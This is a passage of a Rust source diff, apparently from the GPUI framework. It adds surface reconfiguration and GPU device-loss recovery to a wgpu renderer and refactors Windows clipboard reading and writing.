dual_source_blending, ); } } @@ -899,20 +1066,68 @@ impl WgpuRenderer { } } + pub fn max_texture_size(&self) -> u32 { + self.max_texture_size + } + pub fn draw(&mut self, scene: &Scene) { + // Bail out early if the surface has been unconfigured (e.g. during + // Android background/rotation transitions). Attempting to acquire + // a texture from an unconfigured surface can block indefinitely on + // some drivers (Adreno). + if !self.surface_configured { + return; + } + + let last_error = self.last_error.lock().unwrap().take(); + if let Some(error) = last_error { + self.failed_frame_count += 1; + log::error!( + "GPU error during frame (failure {} of 20): {error}", + self.failed_frame_count + ); + if self.failed_frame_count > 20 { + panic!("Too many consecutive GPU errors. Last error: {error}"); + } + } else { + self.failed_frame_count = 0; + } + self.atlas.before_frame(); - let frame = match self.surface.get_current_texture() { - Ok(frame) => frame, - Err(wgpu::SurfaceError::Lost | wgpu::SurfaceError::Outdated) => { - self.surface.configure(&self.device, &self.surface_config); + let frame = match self.resources().surface.get_current_texture() { + wgpu::CurrentSurfaceTexture::Success(frame) => frame, + wgpu::CurrentSurfaceTexture::Suboptimal(frame) => { + // Textures must be destroyed before the surface can be reconfigured. 
+ drop(frame); + let surface_config = self.surface_config.clone(); + let resources = self.resources_mut(); + resources + .surface + .configure(&resources.device, &surface_config); + return; + } + wgpu::CurrentSurfaceTexture::Lost | wgpu::CurrentSurfaceTexture::Outdated => { + let surface_config = self.surface_config.clone(); + let resources = self.resources_mut(); + resources + .surface + .configure(&resources.device, &surface_config); + return; + } + wgpu::CurrentSurfaceTexture::Timeout | wgpu::CurrentSurfaceTexture::Occluded => { return; } - Err(e) => { - log::error!("Failed to acquire surface texture: {e}"); + wgpu::CurrentSurfaceTexture::Validation => { + *self.last_error.lock().unwrap() = + Some("Surface texture validation error".to_string()); return; } }; + + // Now that we know the surface is healthy, ensure intermediate textures exist + self.ensure_intermediate_textures(); + let frame_view = frame .texture .create_view(&wgpu::TextureViewDescriptor::default()); @@ -944,28 +1159,35 @@ impl WgpuRenderer { ..globals }; - self.queue - .write_buffer(&self.globals_buffer, 0, bytemuck::bytes_of(&globals)); - self.queue.write_buffer( - &self.globals_buffer, - self.path_globals_offset, - bytemuck::bytes_of(&path_globals), - ); - self.queue.write_buffer( - &self.globals_buffer, - self.gamma_offset, - bytemuck::bytes_of(&gamma_params), - ); + { + let resources = self.resources(); + resources.queue.write_buffer( + &resources.globals_buffer, + 0, + bytemuck::bytes_of(&globals), + ); + resources.queue.write_buffer( + &resources.globals_buffer, + self.path_globals_offset, + bytemuck::bytes_of(&path_globals), + ); + resources.queue.write_buffer( + &resources.globals_buffer, + self.gamma_offset, + bytemuck::bytes_of(&gamma_params), + ); + } loop { let mut instance_offset: u64 = 0; let mut overflow = false; - let mut encoder = self - .device - .create_command_encoder(&wgpu::CommandEncoderDescriptor { - label: Some("main_encoder"), - }); + let mut encoder = + self.resources() 
+ .device + .create_command_encoder(&wgpu::CommandEncoderDescriptor { + label: Some("main_encoder"), + }); { let mut pass = encoder.begin_render_pass(&wgpu::RenderPassDescriptor { @@ -1085,7 +1307,9 @@ impl WgpuRenderer { continue; } - self.queue.submit(std::iter::once(encoder.finish())); + self.resources() + .queue + .submit(std::iter::once(encoder.finish())); frame.present(); return; } @@ -1101,7 +1325,7 @@ impl WgpuRenderer { self.draw_instances( data, quads.len() as u32, - &self.pipelines.quads, + &self.resources().pipelines.quads, instance_offset, pass, ) @@ -1117,7 +1341,7 @@ impl WgpuRenderer { self.draw_instances( data, shadows.len() as u32, - &self.pipelines.shadows, + &self.resources().pipelines.shadows, instance_offset, pass, ) @@ -1133,7 +1357,7 @@ impl WgpuRenderer { self.draw_instances( data, underlines.len() as u32, - &self.pipelines.underlines, + &self.resources().pipelines.underlines, instance_offset, pass, ) @@ -1152,7 +1376,7 @@ impl WgpuRenderer { data, sprites.len() as u32, &tex_info.view, - &self.pipelines.mono_sprites, + &self.resources().pipelines.mono_sprites, instance_offset, pass, ) @@ -1167,11 +1391,12 @@ impl WgpuRenderer { ) -> bool { let tex_info = self.atlas.get_texture_info(texture_id); let data = unsafe { Self::instance_bytes(sprites) }; - let pipeline = self + let resources = self.resources(); + let pipeline = resources .pipelines .subpixel_sprites .as_ref() - .unwrap_or(&self.pipelines.mono_sprites); + .unwrap_or(&resources.pipelines.mono_sprites); self.draw_instances_with_texture( data, sprites.len() as u32, @@ -1195,7 +1420,7 @@ impl WgpuRenderer { data, sprites.len() as u32, &tex_info.view, - &self.pipelines.poly_sprites, + &self.resources().pipelines.poly_sprites, instance_offset, pass, ) @@ -1215,16 +1440,19 @@ impl WgpuRenderer { let Some((offset, size)) = self.write_to_instance_buffer(instance_offset, data) else { return false; }; - let bind_group = self.device.create_bind_group(&wgpu::BindGroupDescriptor { - label: None, 
- layout: &self.bind_group_layouts.instances, - entries: &[wgpu::BindGroupEntry { - binding: 0, - resource: self.instance_binding(offset, size), - }], - }); + let resources = self.resources(); + let bind_group = resources + .device + .create_bind_group(&wgpu::BindGroupDescriptor { + label: None, + layout: &resources.bind_group_layouts.instances, + entries: &[wgpu::BindGroupEntry { + binding: 0, + resource: self.instance_binding(offset, size), + }], + }); pass.set_pipeline(pipeline); - pass.set_bind_group(0, &self.globals_bind_group, &[]); + pass.set_bind_group(0, &resources.globals_bind_group, &[]); pass.set_bind_group(1, &bind_group, &[]); pass.draw(0..4, 0..instance_count); true @@ -1245,26 +1473,29 @@ impl WgpuRenderer { let Some((offset, size)) = self.write_to_instance_buffer(instance_offset, data) else { return false; }; - let bind_group = self.device.create_bind_group(&wgpu::BindGroupDescriptor { - label: None, - layout: &self.bind_group_layouts.instances_with_texture, - entries: &[ - wgpu::BindGroupEntry { - binding: 0, - resource: self.instance_binding(offset, size), - }, - wgpu::BindGroupEntry { - binding: 1, - resource: wgpu::BindingResource::TextureView(texture_view), - }, - wgpu::BindGroupEntry { - binding: 2, - resource: wgpu::BindingResource::Sampler(&self.atlas_sampler), - }, - ], - }); + let resources = self.resources(); + let bind_group = resources + .device + .create_bind_group(&wgpu::BindGroupDescriptor { + label: None, + layout: &resources.bind_group_layouts.instances_with_texture, + entries: &[ + wgpu::BindGroupEntry { + binding: 0, + resource: self.instance_binding(offset, size), + }, + wgpu::BindGroupEntry { + binding: 1, + resource: wgpu::BindingResource::TextureView(texture_view), + }, + wgpu::BindGroupEntry { + binding: 2, + resource: wgpu::BindingResource::Sampler(&resources.atlas_sampler), + }, + ], + }); pass.set_pipeline(pipeline); - pass.set_bind_group(0, &self.globals_bind_group, &[]); + pass.set_bind_group(0, 
&resources.globals_bind_group, &[]); pass.set_bind_group(1, &bind_group, &[]); pass.draw(0..4, 0..instance_count); true @@ -1302,12 +1533,17 @@ impl WgpuRenderer { vec![PathSprite { bounds }] }; + let resources = self.resources(); + let Some(path_intermediate_view) = resources.path_intermediate_view.as_ref() else { + return true; + }; + let sprite_data = unsafe { Self::instance_bytes(&sprites) }; self.draw_instances_with_texture( sprite_data, sprites.len() as u32, - &self.path_intermediate_view, - &self.pipelines.paths, + path_intermediate_view, + &resources.pipelines.paths, instance_offset, pass, ) @@ -1341,19 +1577,26 @@ impl WgpuRenderer { return false; }; - let data_bind_group = self.device.create_bind_group(&wgpu::BindGroupDescriptor { - label: Some("path_rasterization_bind_group"), - layout: &self.bind_group_layouts.instances, - entries: &[wgpu::BindGroupEntry { - binding: 0, - resource: self.instance_binding(vertex_offset, vertex_size), - }], - }); + let resources = self.resources(); + let data_bind_group = resources + .device + .create_bind_group(&wgpu::BindGroupDescriptor { + label: Some("path_rasterization_bind_group"), + layout: &resources.bind_group_layouts.instances, + entries: &[wgpu::BindGroupEntry { + binding: 0, + resource: self.instance_binding(vertex_offset, vertex_size), + }], + }); + + let Some(path_intermediate_view) = resources.path_intermediate_view.as_ref() else { + return true; + }; - let (target_view, resolve_target) = if let Some(ref msaa_view) = self.path_msaa_view { - (msaa_view, Some(&self.path_intermediate_view)) + let (target_view, resolve_target) = if let Some(ref msaa_view) = resources.path_msaa_view { + (msaa_view, Some(path_intermediate_view)) } else { - (&self.path_intermediate_view, None) + (path_intermediate_view, None) }; { @@ -1372,8 +1615,8 @@ impl WgpuRenderer { ..Default::default() }); - pass.set_pipeline(&self.pipelines.path_rasterization); - pass.set_bind_group(0, &self.path_globals_bind_group, &[]); + 
pass.set_pipeline(&resources.pipelines.path_rasterization); + pass.set_bind_group(0, &resources.path_globals_bind_group, &[]); pass.set_bind_group(1, &data_bind_group, &[]); pass.draw(0..vertices.len() as u32, 0..1); } @@ -1384,7 +1627,8 @@ impl WgpuRenderer { fn grow_instance_buffer(&mut self) { let new_capacity = (self.instance_buffer_capacity * 2).min(self.max_buffer_size); log::info!("increased instance buffer size to {}", new_capacity); - self.instance_buffer = self.device.create_buffer(&wgpu::BufferDescriptor { + let resources = self.resources_mut(); + resources.instance_buffer = resources.device.create_buffer(&wgpu::BufferDescriptor { label: Some("instance_buffer"), size: new_capacity, usage: wgpu::BufferUsages::STORAGE | wgpu::BufferUsages::COPY_DST, @@ -1403,21 +1647,196 @@ impl WgpuRenderer { if offset + size > self.instance_buffer_capacity { return None; } - self.queue.write_buffer(&self.instance_buffer, offset, data); + let resources = self.resources(); + resources + .queue + .write_buffer(&resources.instance_buffer, offset, data); *instance_offset = offset + size; Some((offset, NonZeroU64::new(size).expect("size is at least 16"))) } fn instance_binding(&self, offset: u64, size: NonZeroU64) -> wgpu::BindingResource<'_> { wgpu::BindingResource::Buffer(wgpu::BufferBinding { - buffer: &self.instance_buffer, + buffer: &self.resources().instance_buffer, offset, size: Some(size), }) } + /// Mark the surface as unconfigured so rendering is skipped until a new + /// surface is provided via [`replace_surface`](Self::replace_surface). + /// + /// This does **not** drop the renderer — the device, queue, atlas, and + /// pipelines stay alive. Use this when the native window is destroyed + /// (e.g. Android `TerminateWindow`) but you intend to re-create the + /// surface later without losing cached atlas textures. + pub fn unconfigure_surface(&mut self) { + self.surface_configured = false; + // Drop intermediate textures since they reference the old surface size. 
+ if let Some(res) = self.resources.as_mut() { + res.path_intermediate_texture = None; + res.path_intermediate_view = None; + res.path_msaa_texture = None; + res.path_msaa_view = None; + } + } + + /// Replace the wgpu surface with a new one (e.g. after Android destroys + /// and recreates the native window). Keeps the device, queue, atlas, and + /// all pipelines intact so cached `AtlasTextureId`s remain valid. + /// + /// The `instance` **must** be the same [`wgpu::Instance`] that was used to + /// create the adapter and device (i.e. from the [`WgpuContext`]). Using a + /// different instance will cause a "Device does not exist" panic because + /// the wgpu device is bound to its originating instance. + #[cfg(not(target_family = "wasm"))] + pub fn replace_surface( + &mut self, + window: &W, + config: WgpuSurfaceConfig, + instance: &wgpu::Instance, + ) -> anyhow::Result<()> { + let window_handle = window + .window_handle() + .map_err(|e| anyhow::anyhow!("Failed to get window handle: {e}"))?; + + let surface = create_surface(instance, window_handle.as_raw())?; + + let width = (config.size.width.0 as u32).max(1); + let height = (config.size.height.0 as u32).max(1); + + let alpha_mode = if config.transparent { + self.transparent_alpha_mode + } else { + self.opaque_alpha_mode + }; + + self.surface_config.width = width; + self.surface_config.height = height; + self.surface_config.alpha_mode = alpha_mode; + if let Some(mode) = config.preferred_present_mode { + self.surface_config.present_mode = mode; + } + + { + let res = self + .resources + .as_mut() + .expect("GPU resources not available"); + surface.configure(&res.device, &self.surface_config); + res.surface = surface; + + // Invalidate intermediate textures — they'll be recreated lazily. 
+ res.path_intermediate_texture = None; + res.path_intermediate_view = None; + res.path_msaa_texture = None; + res.path_msaa_view = None; + } + + self.surface_configured = true; + + Ok(()) + } + pub fn destroy(&mut self) { - // wgpu resources are automatically cleaned up when dropped + // Release surface-bound GPU resources eagerly so the underlying native + // window can be destroyed before the renderer itself is dropped. + self.resources.take(); + } + + /// Returns true if the GPU device was lost and recovery is needed. + pub fn device_lost(&self) -> bool { + self.device_lost.load(std::sync::atomic::Ordering::SeqCst) + } + + /// Recovers from a lost GPU device by recreating the renderer with a new context. + /// + /// Call this after detecting `device_lost()` returns true. + /// + /// This method coordinates recovery across multiple windows: + /// - The first window to call this will recreate the shared context + /// - Subsequent windows will adopt the already-recovered context + #[cfg(not(target_family = "wasm"))] + pub fn recover(&mut self, window: &W) -> anyhow::Result<()> + where + W: HasWindowHandle + HasDisplayHandle + std::fmt::Debug + Send + Sync + Clone + 'static, + { + let gpu_context = self.context.as_ref().expect("recover requires gpu_context"); + + // Check if another window already recovered the context + let needs_new_context = gpu_context + .borrow() + .as_ref() + .is_none_or(|ctx| ctx.device_lost()); + + let window_handle = window + .window_handle() + .map_err(|e| anyhow::anyhow!("Failed to get window handle: {e}"))?; + + let surface = if needs_new_context { + log::warn!("GPU device lost, recreating context..."); + + // Drop old resources to release Arc/Arc and GPU resources + self.resources = None; + *gpu_context.borrow_mut() = None; + + // Wait for GPU driver to stabilize (350ms copied from windows :shrug:) + std::thread::sleep(std::time::Duration::from_millis(350)); + + let instance = WgpuContext::instance(Box::new(window.clone())); + let 
surface = create_surface(&instance, window_handle.as_raw())?; + let new_context = WgpuContext::new(instance, &surface, self.compositor_gpu)?; + *gpu_context.borrow_mut() = Some(new_context); + surface + } else { + let ctx_ref = gpu_context.borrow(); + let instance = &ctx_ref.as_ref().unwrap().instance; + create_surface(instance, window_handle.as_raw())? + }; + + let config = WgpuSurfaceConfig { + size: gpui::Size { + width: gpui::DevicePixels(self.surface_config.width as i32), + height: gpui::DevicePixels(self.surface_config.height as i32), + }, + transparent: self.surface_config.alpha_mode != wgpu::CompositeAlphaMode::Opaque, + preferred_present_mode: Some(self.surface_config.present_mode), + }; + let gpu_context = Rc::clone(gpu_context); + let ctx_ref = gpu_context.borrow(); + let context = ctx_ref.as_ref().expect("context should exist"); + + self.resources = None; + self.atlas + .handle_device_lost(Arc::clone(&context.device), Arc::clone(&context.queue)); + + *self = Self::new_internal( + Some(gpu_context.clone()), + context, + surface, + config, + self.compositor_gpu, + self.atlas.clone(), + )?; + + log::info!("GPU recovery complete"); + Ok(()) + } +} + +#[cfg(not(target_family = "wasm"))] +fn create_surface( + instance: &wgpu::Instance, + raw_window_handle: raw_window_handle::RawWindowHandle, +) -> anyhow::Result> { + unsafe { + instance + .create_surface_unsafe(wgpu::SurfaceTargetUnsafe::RawHandle { + // Fall back to the display handle already provided via InstanceDescriptor::display. 
+ raw_display_handle: None, + raw_window_handle, + }) + .map_err(|e| anyhow::anyhow!("{e}")) } } diff --git a/crates/gpui_windows/src/clipboard.rs b/crates/gpui_windows/src/clipboard.rs index c2b8c0ff30c4d9e4c99c9d8c69ffcbf3da19211b..cd0694ab3159984ee7e66f0d71f8c3a6c6ea16b6 100644 --- a/crates/gpui_windows/src/clipboard.rs +++ b/crates/gpui_windows/src/clipboard.rs @@ -8,24 +8,22 @@ use windows::Win32::{ System::{ DataExchange::{ CloseClipboard, CountClipboardFormats, EmptyClipboard, EnumClipboardFormats, - GetClipboardData, GetClipboardFormatNameW, IsClipboardFormatAvailable, OpenClipboard, - RegisterClipboardFormatW, SetClipboardData, + GetClipboardData, GetClipboardFormatNameW, OpenClipboard, RegisterClipboardFormatW, + SetClipboardData, }, Memory::{GMEM_MOVEABLE, GlobalAlloc, GlobalLock, GlobalSize, GlobalUnlock}, Ole::{CF_DIB, CF_HDROP, CF_UNICODETEXT}, }, UI::Shell::{DragQueryFileW, HDROP}, }; -use windows_core::PCWSTR; +use windows::core::{Owned, PCWSTR}; use gpui::{ ClipboardEntry, ClipboardItem, ClipboardString, ExternalPaths, Image, ImageFormat, hash, }; -// https://learn.microsoft.com/en-us/windows/win32/api/shellapi/nf-shellapi-dragqueryfilew const DRAGDROP_GET_FILES_COUNT: u32 = 0xFFFFFFFF; -// Clipboard formats static CLIPBOARD_HASH_FORMAT: LazyLock = LazyLock::new(|| register_clipboard_format(windows::core::w!("GPUI internal text hash"))); static CLIPBOARD_METADATA_FORMAT: LazyLock = @@ -39,47 +37,94 @@ static CLIPBOARD_PNG_FORMAT: LazyLock = static CLIPBOARD_JPG_FORMAT: LazyLock = LazyLock::new(|| register_clipboard_format(windows::core::w!("JFIF"))); -// Helper maps and sets -static FORMATS_MAP: LazyLock> = LazyLock::new(|| { - let mut formats_map = FxHashMap::default(); - formats_map.insert(CF_UNICODETEXT.0 as u32, ClipboardFormatType::Text); - formats_map.insert(*CLIPBOARD_PNG_FORMAT, ClipboardFormatType::Image); - formats_map.insert(*CLIPBOARD_GIF_FORMAT, ClipboardFormatType::Image); - formats_map.insert(*CLIPBOARD_JPG_FORMAT, 
ClipboardFormatType::Image); - formats_map.insert(*CLIPBOARD_SVG_FORMAT, ClipboardFormatType::Image); - formats_map.insert(CF_DIB.0 as u32, ClipboardFormatType::Image); - formats_map.insert(CF_HDROP.0 as u32, ClipboardFormatType::Files); - formats_map -}); static IMAGE_FORMATS_MAP: LazyLock> = LazyLock::new(|| { - let mut formats_map = FxHashMap::default(); - formats_map.insert(*CLIPBOARD_PNG_FORMAT, ImageFormat::Png); - formats_map.insert(*CLIPBOARD_GIF_FORMAT, ImageFormat::Gif); - formats_map.insert(*CLIPBOARD_JPG_FORMAT, ImageFormat::Jpeg); - formats_map.insert(*CLIPBOARD_SVG_FORMAT, ImageFormat::Svg); - formats_map + let mut map = FxHashMap::default(); + map.insert(*CLIPBOARD_PNG_FORMAT, ImageFormat::Png); + map.insert(*CLIPBOARD_GIF_FORMAT, ImageFormat::Gif); + map.insert(*CLIPBOARD_JPG_FORMAT, ImageFormat::Jpeg); + map.insert(*CLIPBOARD_SVG_FORMAT, ImageFormat::Svg); + map }); -#[derive(Debug, Clone, Copy)] -enum ClipboardFormatType { - Text, - Image, - Files, +fn register_clipboard_format(format: PCWSTR) -> u32 { + let ret = unsafe { RegisterClipboardFormatW(format) }; + if ret == 0 { + panic!( + "Error when registering clipboard format: {}", + std::io::Error::last_os_error() + ); + } + log::debug!( + "Registered clipboard format {} as {}", + unsafe { format.display() }, + ret + ); + ret +} + +fn get_clipboard_data(format: u32) -> Option { + let global = HGLOBAL(unsafe { GetClipboardData(format).ok() }?.0); + LockedGlobal::lock(global) } pub(crate) fn write_to_clipboard(item: ClipboardItem) { - with_clipboard(|| write_to_clipboard_inner(item)); + let Some(_clip) = ClipboardGuard::open() else { + return; + }; + + let result: Result<()> = (|| { + unsafe { EmptyClipboard()? 
}; + for entry in item.entries() { + match entry { + ClipboardEntry::String(string) => write_string(string)?, + ClipboardEntry::Image(image) => write_image(image)?, + ClipboardEntry::ExternalPaths(_) => {} + } + } + Ok(()) + })(); + + if let Err(e) = result { + log::error!("Failed to write to clipboard: {e}"); + } } pub(crate) fn read_from_clipboard() -> Option { - with_clipboard(|| { - with_best_match_format(|item_format| match format_to_type(item_format) { - ClipboardFormatType::Text => read_string_from_clipboard(), - ClipboardFormatType::Image => read_image_from_clipboard(item_format), - ClipboardFormatType::Files => read_files_from_clipboard(), - }) - }) - .flatten() + let _clip = ClipboardGuard::open()?; + + let mut entries = Vec::new(); + let mut have_text = false; + let mut have_image = false; + let mut have_files = false; + + let count = unsafe { CountClipboardFormats() }; + let mut format = 0; + for _ in 0..count { + format = unsafe { EnumClipboardFormats(format) }; + + if !have_text && format == CF_UNICODETEXT.0 as u32 { + if let Some(entry) = read_string() { + entries.push(entry); + have_text = true; + } + } else if !have_image && is_image_format(format) { + if let Some(entry) = read_image(format) { + entries.push(entry); + have_image = true; + } + } else if !have_files && format == CF_HDROP.0 as u32 { + if let Some(entry) = read_files() { + entries.push(entry); + have_files = true; + } + } + } + + if entries.is_empty() { + log_unsupported_clipboard_formats(); + return None; + } + Some(ClipboardItem { entries }) } pub(crate) fn with_file_names(hdrop: HDROP, mut f: F) @@ -97,359 +142,247 @@ where } match String::from_utf16(&buffer[0..filename_length]) { Ok(file_name) => f(file_name), - Err(e) => { - log::error!("dragged file name is not UTF-16: {}", e) - } + Err(e) => log::error!("dragged file name is not UTF-16: {}", e), } } } -fn with_clipboard(f: F) -> Option -where - F: FnOnce() -> T, -{ - match unsafe { OpenClipboard(None) } { - Ok(()) => { - let 
result = f(); - if let Err(e) = unsafe { CloseClipboard() } { - log::error!("Failed to close clipboard: {e}",); - } - Some(result) - } - Err(e) => { - log::error!("Failed to open clipboard: {e}",); - None - } +fn set_clipboard_bytes(data: &[T], format: u32) -> Result<()> { + unsafe { + let global = Owned::new(GlobalAlloc(GMEM_MOVEABLE, std::mem::size_of_val(data))?); + let ptr = GlobalLock(*global); + anyhow::ensure!(!ptr.is_null(), "GlobalLock returned null"); + std::ptr::copy_nonoverlapping(data.as_ptr(), ptr as _, data.len()); + GlobalUnlock(*global).ok(); + SetClipboardData(format, Some(HANDLE(global.0)))?; + // SetClipboardData succeeded — the system now owns the memory. + std::mem::forget(global); } + Ok(()) } -fn register_clipboard_format(format: PCWSTR) -> u32 { - let ret = unsafe { RegisterClipboardFormatW(format) }; - if ret == 0 { - panic!( - "Error when registering clipboard format: {}", - std::io::Error::last_os_error() - ); +fn get_clipboard_string(format: u32) -> Option { + let locked = get_clipboard_data(format)?; + let bytes = locked.as_bytes(); + let words_len = bytes.len() / std::mem::size_of::(); + if words_len == 0 { + return Some(String::new()); } - log::debug!( - "Registered clipboard format {} as {}", - unsafe { format.display() }, - ret - ); - ret + let slice = unsafe { std::slice::from_raw_parts(bytes.as_ptr() as *const u16, words_len) }; + let actual_len = slice.iter().position(|&c| c == 0).unwrap_or(words_len); + Some(String::from_utf16_lossy(&slice[..actual_len])) } -#[inline] -fn format_to_type(item_format: u32) -> &'static ClipboardFormatType { - FORMATS_MAP.get(&item_format).unwrap() -} - -// Currently, we only write the first item. 
-fn write_to_clipboard_inner(item: ClipboardItem) -> Result<()> { - unsafe { - EmptyClipboard()?; - } - match item.entries().first() { - Some(entry) => match entry { - ClipboardEntry::String(string) => { - write_string_to_clipboard(string)?; - } - ClipboardEntry::Image(image) => { - write_image_to_clipboard(image)?; - } - ClipboardEntry::ExternalPaths(_) => {} - }, - None => { - // Writing an empty list of entries just clears the clipboard. - } - } - Ok(()) +fn is_image_format(format: u32) -> bool { + IMAGE_FORMATS_MAP.contains_key(&format) || format == CF_DIB.0 as u32 } -fn write_string_to_clipboard(item: &ClipboardString) -> Result<()> { - let encode_wide = item.text.encode_utf16().chain(Some(0)).collect_vec(); - set_data_to_clipboard(&encode_wide, CF_UNICODETEXT.0 as u32)?; +fn write_string(item: &ClipboardString) -> Result<()> { + let wide: Vec = item.text.encode_utf16().chain(Some(0)).collect_vec(); + set_clipboard_bytes(&wide, CF_UNICODETEXT.0 as u32)?; if let Some(metadata) = item.metadata.as_ref() { - let hash_result = { - let hash = ClipboardString::text_hash(&item.text); - hash.to_ne_bytes() - }; - let encode_wide = - unsafe { std::slice::from_raw_parts(hash_result.as_ptr().cast::(), 4) }; - set_data_to_clipboard(encode_wide, *CLIPBOARD_HASH_FORMAT)?; - - let metadata_wide = metadata.encode_utf16().chain(Some(0)).collect_vec(); - set_data_to_clipboard(&metadata_wide, *CLIPBOARD_METADATA_FORMAT)?; + let hash_bytes = ClipboardString::text_hash(&item.text).to_ne_bytes(); + set_clipboard_bytes(&hash_bytes, *CLIPBOARD_HASH_FORMAT)?; + + let wide: Vec = metadata.encode_utf16().chain(Some(0)).collect_vec(); + set_clipboard_bytes(&wide, *CLIPBOARD_METADATA_FORMAT)?; } Ok(()) } -fn set_data_to_clipboard(data: &[T], format: u32) -> Result<()> { - unsafe { - let global = GlobalAlloc(GMEM_MOVEABLE, std::mem::size_of_val(data))?; - let handle = GlobalLock(global); - std::ptr::copy_nonoverlapping(data.as_ptr(), handle as _, data.len()); - let _ = GlobalUnlock(global); 
- SetClipboardData(format, Some(HANDLE(global.0)))?; +fn write_image(item: &Image) -> Result<()> { + let native_format = match item.format { + ImageFormat::Svg => Some(*CLIPBOARD_SVG_FORMAT), + ImageFormat::Gif => Some(*CLIPBOARD_GIF_FORMAT), + ImageFormat::Png => Some(*CLIPBOARD_PNG_FORMAT), + ImageFormat::Jpeg => Some(*CLIPBOARD_JPG_FORMAT), + _ => None, + }; + if let Some(format) = native_format { + set_clipboard_bytes(item.bytes(), format)?; } - Ok(()) -} -// Here writing PNG to the clipboard to better support other apps. For more info, please ref to -// the PR. -fn write_image_to_clipboard(item: &Image) -> Result<()> { - match item.format { - ImageFormat::Svg => set_data_to_clipboard(item.bytes(), *CLIPBOARD_SVG_FORMAT)?, - ImageFormat::Gif => { - set_data_to_clipboard(item.bytes(), *CLIPBOARD_GIF_FORMAT)?; - let png_bytes = convert_image_to_png_format(item.bytes(), ImageFormat::Gif)?; - set_data_to_clipboard(&png_bytes, *CLIPBOARD_PNG_FORMAT)?; - } - ImageFormat::Png => { - set_data_to_clipboard(item.bytes(), *CLIPBOARD_PNG_FORMAT)?; - let png_bytes = convert_image_to_png_format(item.bytes(), ImageFormat::Png)?; - set_data_to_clipboard(&png_bytes, *CLIPBOARD_PNG_FORMAT)?; - } - ImageFormat::Jpeg => { - set_data_to_clipboard(item.bytes(), *CLIPBOARD_JPG_FORMAT)?; - let png_bytes = convert_image_to_png_format(item.bytes(), ImageFormat::Jpeg)?; - set_data_to_clipboard(&png_bytes, *CLIPBOARD_PNG_FORMAT)?; - } - other => { - log::warn!( - "Clipboard unsupported image format: {:?}, convert to PNG instead.", - item.format - ); - let png_bytes = convert_image_to_png_format(item.bytes(), other)?; - set_data_to_clipboard(&png_bytes, *CLIPBOARD_PNG_FORMAT)?; + // Also provide a PNG copy for broad compatibility. + // SVG can't be rasterized by the image crate, so skip it. 
+ if item.format != ImageFormat::Svg && native_format != Some(*CLIPBOARD_PNG_FORMAT) { + if let Some(png_bytes) = convert_to_png(item.bytes(), item.format) { + set_clipboard_bytes(&png_bytes, *CLIPBOARD_PNG_FORMAT)?; } } Ok(()) } -fn convert_image_to_png_format(bytes: &[u8], image_format: ImageFormat) -> Result> { - let image = - image::load_from_memory_with_format(bytes, gpui_image_format_to_image(image_format))?; - let mut output_buf = Vec::new(); - image.write_to( - &mut std::io::Cursor::new(&mut output_buf), - image::ImageFormat::Png, - )?; - Ok(output_buf) -} - -// Here, we enumerate all formats on the clipboard and find the first one that we can process. -// The reason we don't use `GetPriorityClipboardFormat` is that it sometimes returns the -// wrong format. -// For instance, when copying a JPEG image from Microsoft Word, there may be several formats -// on the clipboard: Jpeg, Png, Svg. -// If we use `GetPriorityClipboardFormat`, it will return Svg, which is not what we want. -fn with_best_match_format(f: F) -> Option -where - F: Fn(u32) -> Option, -{ - let mut text = None; - let mut image = None; - let mut files = None; - let count = unsafe { CountClipboardFormats() }; - let mut clipboard_format = 0; - for _ in 0..count { - clipboard_format = unsafe { EnumClipboardFormats(clipboard_format) }; - let Some(item_format) = FORMATS_MAP.get(&clipboard_format) else { - continue; - }; - let bucket = match item_format { - ClipboardFormatType::Text if text.is_none() => &mut text, - ClipboardFormatType::Image if image.is_none() => &mut image, - ClipboardFormatType::Files if files.is_none() => &mut files, - _ => continue, - }; - if let Some(entry) = f(clipboard_format) { - *bucket = Some(entry); - } - } - - if let Some(entry) = [image, files, text].into_iter().flatten().next() { - return Some(ClipboardItem { - entries: vec![entry], - }); - } - - // log the formats that we don't support yet. 
- { - clipboard_format = 0; - for _ in 0..count { - clipboard_format = unsafe { EnumClipboardFormats(clipboard_format) }; - let mut buffer = [0u16; 64]; - unsafe { GetClipboardFormatNameW(clipboard_format, &mut buffer) }; - let format_name = String::from_utf16_lossy(&buffer); - log::warn!( - "Try to paste with unsupported clipboard format: {}, {}.", - clipboard_format, - format_name - ); - } - } - None +fn convert_to_png(bytes: &[u8], format: ImageFormat) -> Option> { + let img_format = gpui_to_image_format(format)?; + let image = image::load_from_memory_with_format(bytes, img_format) + .map_err(|e| log::warn!("Failed to decode image for PNG conversion: {e}")) + .ok()?; + let mut buf = Vec::new(); + image + .write_to(&mut std::io::Cursor::new(&mut buf), image::ImageFormat::Png) + .map_err(|e| log::warn!("Failed to encode PNG: {e}")) + .ok()?; + Some(buf) } -fn read_string_from_clipboard() -> Option { - let text = with_clipboard_data(CF_UNICODETEXT.0 as u32, |data_ptr, _| { - let pcwstr = PCWSTR(data_ptr as *const u16); - String::from_utf16_lossy(unsafe { pcwstr.as_wide() }) - })?; - let Some(hash) = read_hash_from_clipboard() else { - return Some(ClipboardEntry::String(ClipboardString::new(text))); - }; - let Some(metadata) = read_metadata_from_clipboard() else { - return Some(ClipboardEntry::String(ClipboardString::new(text))); - }; - if hash == ClipboardString::text_hash(&text) { - Some(ClipboardEntry::String(ClipboardString { - text, - metadata: Some(metadata), - })) - } else { - Some(ClipboardEntry::String(ClipboardString::new(text))) - } +fn read_string() -> Option { + let text = get_clipboard_string(CF_UNICODETEXT.0 as u32)?; + let metadata = read_clipboard_metadata(&text); + Some(ClipboardEntry::String(ClipboardString { text, metadata })) } -fn read_hash_from_clipboard() -> Option { - if unsafe { IsClipboardFormatAvailable(*CLIPBOARD_HASH_FORMAT).is_err() } { +fn read_clipboard_metadata(text: &str) -> Option { + let locked = 
